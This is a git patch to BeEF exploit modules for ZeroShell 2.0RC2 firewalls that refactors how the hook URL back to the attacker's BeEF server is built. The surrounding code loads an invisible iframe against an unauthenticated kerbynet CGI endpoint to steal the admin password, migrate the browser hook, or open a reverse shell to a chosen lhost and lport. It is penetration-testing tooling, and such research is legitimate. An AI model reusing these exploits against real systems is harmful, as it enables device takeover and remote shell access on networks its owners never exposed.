From 861e846dbea6754b529a2dfc4dbe4aac433e0ea7 Mon Sep 17 00:00:00 2001 From: Yann CAM Date: Wed, 5 Oct 2016 14:20:12 +0200 Subject: [PATCH] Update hookuri auto-generated and generic (proto / host / port / hook name). Replace tab with space. --- .../zeroshell/zeroshell_2_0rc2_admin_password/config.yaml | 2 +- .../zeroshell/zeroshell_2_0rc2_migrate_hook/command.js | 6 +++--- .../zeroshell/zeroshell_2_0rc2_migrate_hook/module.rb | 2 -- .../command.js | 4 ++-- .../module.rb | 2 -- 5 files changed, 6 insertions(+), 10 deletions(-) diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/config.yaml b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/config.yaml index fa7bb5389..de83a91cb 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/config.yaml +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/config.yaml @@ -7,7 +7,7 @@ beef: module: zeroshell_2_0rc2_admin_password: enable: true - category: ["Exploits", "ZeroShell"] + category: ["Exploits", "ZeroShell"] name: "ZeroShell <= 2.0RC2 Admin Password" description: "Attempts to get the admin password on a ZeroShell <= 2.0RC2
This module works only when the hook is on ZeroShell, please migrate to the ZeroShell target before using it.
Vulnerability found and PoC provided by Yann CAM @ASafety / Synetis.
BeEF module originally created by ycam.
For more information refer to http://packetstormsecurity.com/files/122799/zeroshell-execdisclose.txt
Patched in version 2.0RC3.
" authors: ["ycam"] diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js b/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js index d146e2631..5e0f193db 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js @@ -7,10 +7,10 @@ beef.execute(function() { var rhost = '<%= @rhost %>'; var rport = '<%= @rport %>'; - var hookuri = '<%= @hookuri %>'; + var hook = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + beef.net.hook; + + var target = "http://" + rhost + ":" + rport +"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=x"; - var target = "http://" + rhost + ":" + rport +"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=x"; - var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe(); iframe_<%= @command_id %>.setAttribute('src', target); diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/module.rb b/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/module.rb index 8c9976cdc..7bc7ada20 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/module.rb +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/module.rb @@ -7,9 +7,7 @@ class Zeroshell_2_0rc2_migrate_hook < BeEF::Core::Command def self.options configuration = BeEF::Core::Configuration.instance - hookuri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js" return [ - { 'name' => 'hookuri', 'ui_label' => 'URL', 'type' => 'text', 'width' => '400px', 'value' => hookuri}, { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'}, { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' } ] diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js index 009b627f0..4864042ee 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js @@ -9,9 +9,9 @@ beef.execute(function() { var rport = '<%= @rport %>'; var lhost = '<%= @lhost %>'; var lport = '<%= @lport %>'; - var hookuri = '<%= @hookuri %>'; + var hook = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + "/x.js"; - var target = "http://" + rhost + ":" + rport +"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=x#lhost=" + lhost + "&lport=" + lport; + var target = "http://" + rhost + ":" + rport +"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=x#lhost=" + lhost + "&lport=" + lport; var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe(); iframe_<%= @command_id %>.setAttribute('src', target); diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/module.rb b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/module.rb index 27646afa2..d2dd74177 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/module.rb +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/module.rb @@ -12,9 +12,7 @@ class Zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass < BeEF::Core::Command configuration = BeEF::Core::Configuration.instance lhost = "#{configuration.get("beef.http.host")}" lhost = "" if lhost == "0.0.0.0" - hookuri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/x.js" return [ - { 'name' => 'hookuri', 'ui_label' => 'URL', 'type' => 'text', 'width' => '400px', 'value' => hookuri}, { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'}, { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' }, { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost},